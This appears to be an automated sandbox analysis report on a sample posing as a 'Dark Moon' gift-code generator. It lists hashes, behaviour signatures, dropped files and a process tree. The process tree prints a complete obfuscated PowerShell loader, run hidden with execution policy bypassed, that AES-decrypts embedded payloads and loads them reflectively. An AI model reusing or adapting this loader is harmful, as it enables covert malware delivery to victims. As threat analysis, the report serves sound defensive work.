Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
02-06-2024 15:12
Static task
static1
Behavioral task
behavioral1
Sample
DarkMoon_Gen_1-3/lib/main.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
DarkMoon_Gen_1-3/lib/uni.bat
Resource
win7-20240220-en
Behavioral task
behavioral3
Sample
DarkMoon_Gen_1-3/lib/uni.bat
Resource
win10v2004-20240426-en
Behavioral task
behavioral4
Sample
DarkMoon_Gen_1-3/starter.bat
Resource
win7-20240508-en
Behavioral task
behavioral5
Sample
DarkMoon_Gen_1-3/starter.bat
Resource
win10v2004-20240426-en
General
-
Target
DarkMoon_Gen_1-3/starter.bat
-
Size
51B
-
MD5
abc778ba27885c72f364ad89b1306862
-
SHA1
2d4bfe8e2de4390109e8fa786ad47ec68daeaffe
-
SHA256
97c5438395ba799a673564195db730de8d9742a7a141566fa7c9075c46e3a039
-
SHA512
65a9bcdb3493526dd0b340aacabd30cd2e577a03cac920341e7be041e8de133ced0ab45c14a2509fbbd6f2451ac3ef1f5d520328d44f06aa4af6bfb122991f8f
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
uni.bat.exepid process 2104 uni.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 2136 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
main.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" main.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 13 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 2660 timeout.exe 2800 timeout.exe 2272 timeout.exe 2316 timeout.exe 3012 timeout.exe 1984 timeout.exe 2028 timeout.exe 1188 timeout.exe 484 timeout.exe 2908 timeout.exe 1388 timeout.exe 2308 timeout.exe 1904 timeout.exe -
Runs ping.exe 1 TTPs 17 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 2328 PING.EXE 2752 PING.EXE 1628 PING.EXE 1312 PING.EXE 2732 PING.EXE 2584 PING.EXE 2676 PING.EXE 2596 PING.EXE 2488 PING.EXE 468 PING.EXE 768 PING.EXE 1280 PING.EXE 2740 PING.EXE 2604 PING.EXE 2644 PING.EXE 2912 PING.EXE 2816 PING.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
uni.bat.exepid process 2104 uni.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
uni.bat.exedescription pid process Token: SeDebugPrivilege 2104 uni.bat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exemain.execmd.execmd.exedescription pid process target process PID 2056 wrote to memory of 2136 2056 cmd.exe cmd.exe PID 2056 wrote to memory of 2136 2056 cmd.exe cmd.exe PID 2056 wrote to memory of 2136 2056 cmd.exe cmd.exe PID 2056 wrote to memory of 2188 2056 cmd.exe main.exe PID 2056 wrote to memory of 2188 2056 cmd.exe main.exe PID 2056 wrote to memory of 2188 2056 cmd.exe main.exe PID 2188 wrote to memory of 2904 2188 main.exe cmd.exe PID 2188 wrote to memory of 2904 2188 main.exe cmd.exe PID 2188 wrote to memory of 2904 2188 main.exe cmd.exe PID 2904 wrote to memory of 2100 2904 cmd.exe chcp.com PID 2904 wrote to memory of 2100 2904 cmd.exe chcp.com PID 2904 wrote to memory of 2100 2904 cmd.exe chcp.com PID 2904 wrote to memory of 3012 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 3012 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 3012 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 2676 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2676 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2676 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2740 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2740 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2740 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2604 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2604 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2604 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2596 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2596 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2596 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2328 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2328 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2328 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2732 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2732 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2732 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2584 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2584 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2584 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2644 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2644 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2644 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2488 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2488 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2488 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 1984 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 1984 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 1984 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 2912 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2912 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2912 2904 cmd.exe PING.EXE PID 2136 wrote to memory of 2104 2136 cmd.exe uni.bat.exe PID 2136 wrote to memory of 2104 2136 cmd.exe uni.bat.exe PID 2136 wrote to memory of 2104 2136 cmd.exe uni.bat.exe PID 2904 wrote to memory of 2660 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 2660 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 2660 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 2752 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2752 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2752 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2800 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 2800 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 2800 2904 cmd.exe timeout.exe PID 2904 wrote to memory of 2816 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2816 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2816 2904 cmd.exe PING.EXE PID 2904 wrote to memory of 2908 2904 cmd.exe timeout.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\starter.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K uni.bat2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\main.exemain.exe2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "Dark Moon gen.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping discord.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.paysafecard.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.amazon.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping play.google.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping store.steampowered.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping netflix.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.spotify.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.xbox.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.google.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.batFilesize
35KB
MD5c153581143e0b72cecae38a393991a4b
SHA1da43d03b19765594ff124415a060551343823a39
SHA2562fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005
SHA5128c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f
-
\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/2104-8-0x000000001B3A0000-0x000000001B682000-memory.dmpFilesize
2.9MB
-
memory/2104-9-0x0000000002180000-0x0000000002188000-memory.dmpFilesize
32KB